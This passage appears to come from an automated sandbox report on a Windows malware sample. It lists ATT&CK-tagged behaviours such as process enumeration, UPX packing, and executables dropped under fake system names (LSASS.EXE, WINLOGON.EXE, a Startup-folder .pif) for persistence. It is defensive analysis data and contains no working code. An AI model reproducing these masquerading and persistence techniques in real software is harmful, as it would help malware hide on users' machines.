{\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"356\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"396\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"404\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"460\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"500\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"608\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"684\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"776\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"840\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"868\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"908\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1136\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1272\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1316\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1504\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1600\"}\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1664\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" opened \"\\Device\\KsecDD\"\n \"4k51k4.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"4k51k4.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an entrypoint in section \"UPX1\"\n \"services.exe\" has an entrypoint in section \"UPX1\"\n \"shell.exe\" has an entrypoint in section \"UPX1\"\n \"4k51k4.exe\" has an entrypoint in section \"UPX1\"\n \"CSRSS .exe\" has an entrypoint in section \"UPX1\"\n \"New Folder.exe\" has an entrypoint in section \"UPX1\"\n \"Data HAPUBWS.exe\" has an entrypoint in section \"UPX1\"\n \"Empty.pif\" has an entrypoint in section \"UPX1\"\n \"WINLOGON.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9CA14.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE.bin\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C477.bin\" has an entrypoint in section \"UPX1\"\n \"SMSS.EXE\" has an entrypoint in section \"UPX1\"\n \"LSASS.EXE\" has an entrypoint in section \"UPX1\"\n \"MrHelloween.scr\" has an entrypoint in section \"UPX1\"\n \"4K51K4.EXE.67A9C852.bin\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C855.bin\" has an entrypoint in section \"UPX1\"\n \"IEXPLORER.EXE.67A9C479.bin\" has an entrypoint in section \"UPX1\"\n \"CSRSS.EXE\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00002632]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00002632]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00002632]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9CA14.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C477.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00002632]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00002632]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00002632]\n \"4K51K4.EXE.67A9C852.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C855.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67A9C479.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00002632]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00002632]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00002632]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00002632]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00002632]\n \"4K51K4.EXE.67A9CA11.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Windows\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46827 bytes starting with PE header signature to file \"C:\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46744 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrHelloween.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46935 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46794 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46804 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46859 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46815 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46959 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46813 bytes starting with PE header signature to file \"C:\\4K51K4\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 46909 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\4k51k4.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" wrote 47177 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\IExplorer.exe\": 